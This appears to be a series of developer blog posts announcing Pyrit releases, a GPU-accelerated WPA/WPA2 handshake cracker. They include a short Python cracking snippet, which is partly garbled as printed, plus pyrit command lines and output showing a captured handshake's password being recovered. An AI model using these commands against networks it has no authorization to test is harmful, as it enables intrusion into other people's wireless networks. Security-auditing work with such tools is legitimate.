The world’s smallest WPA-tools

Cowpatty’s genpmk – with extensive hardware support added – in 2 lines of code:

from cpyrit import util
map(util.CowpattyWriter(essid=’linksys’, f=’linksys.cow’).write, util.PassthroughIterator(essid=’linksys’, iterable=open(‘dict’)))

A GPGPU-driven WPA/WPA2-cracker in 7 lines of code:

from cpyrit import util, pckttools
with pckttools.EAPOLCracker(pckttools.PacketParser(‘wpa2psk-linksys.dump’)[’00:0b:86:c2:a4:85′][’00:13:ce:55:98:ef’].auths[0]) as cracker:
>>>>for pmks in util.PassthroughIterator(‘linksys’, open(‘dict’)):
>>>>>>>>if cracker.solution is not None:
print “The password is ‘%s'” % cracker.solution

Isn’t Python great?


Pyrit 0.2.4 released

Pyrit 0.2.4 was just tagged and is now the currently stable version. Enjoy.

The most important new feature is the ability parse packet-capture files and attack EAPOL-authentications on it’s own. See the recent posts or the documentation for more details. Pyrit can also use SSE2 on MacOS and SELinux-enabled machines now.

You can get the new version right here.

Combining dumps in 0.2.4 r166

Pyrit 0.2.4-dev (r166) can now deal with multiple packet-capture files. Added with the on-the-fly handling of gzip-compressed files, this makes it particular easy to combine many pcap-dumps to one small file that holds all the essential information.

pyrit -r “*.pcap” -f summary.pcap.gz strip
Pyrit 0.2.4-dev (svn r166) (C) 2008, 2009 Lukas Lueg
This code is distributed under the GNU General Public License v3

39707 packets (33997 802.11-packets), 7 APs

New pcap-file written (18 out of 39707 packets)

The new file “summary.pcap.gz” in this example is just 1.8kb – down from 8 files of 11mb total size.

Note that you must use quotation marks if you use wildcards on the command-line.

More docs

I’ve updated Pyrit’s documentation with some lines about the new features in 0.2.4 (including the new strip-command).

There is also some (basic) information in case you would like to port Pyrit to a new hardware-platform. Pyrit on FPGA anyone?


A note to users using code from trunk: You need to svn-update, recompile and reinstall the extension modules as they are now part of the ‘cpyrit’-package. The ‘_cpyrit’-package is gone.

0.2.4 gaining attack-capabilites

I’ve decided to take Pyrit one step further and add actual “attack capabilities”. I have some difficulties with this as the actual legal situation in germany is – putting it mildly – undefined. On the other hand I’m disappointed with the state of tools that currently are available….

So here is the juicy stuff: Pyrit 0.2.4-dev rev146 adds four new commands to the commandline-client:

  • analyze’ parses a pcap-dump and shows some information about AccessPoints, Stations and the presence of WPA-PSK handshakes.
  • attack_passthrough‘ is the most basic attack mode and resembles piping PMKs to other tools like cowpatty. It takes a pcap-dump and attacks available handshakes using passwords read from a file. The database is not touched at all by this. Good for LiveCDs but you lose the advantage of having pre-computed PMKs.
  • attack_batch‘ uses passwords and PMKs stored in the database to attack the handshake. The PMKs are taken from the databased if already computed. Otherwise the passwords are translated into their respective PMKs which are stored on-the-fly for later re-use.
  • attack_db‘ uses only PMKs that are already in the database. Handy if you don’t want your box to get crushed under load.

And here is what it looks like:

pyrit -r test.pcap -e dlink attack_batch
Pyrit 0.2.4-dev (svn r146) (C) 2008, 2009 Lukas Lueg
This code is distributed under the GNU General Public License v3

Parsing file ‘test.pcap’… 426 packets (375 802.11-packets), 4 APs

Picked AccessPoint [hidden] automatically…
Attacking handshake with Station [hidden]…
Tried 3443172 PMKs so far; 675577 PMKs per second.

The password is ‘12345678’.

Notice the number of 675,577 passwords per second :-) Oh and by the way: Pyrit will from now on require scapy to be installed, so check your package manager…

  • RSS Unknown Feed

    • An error has occurred; the feed is probably down. Try again later.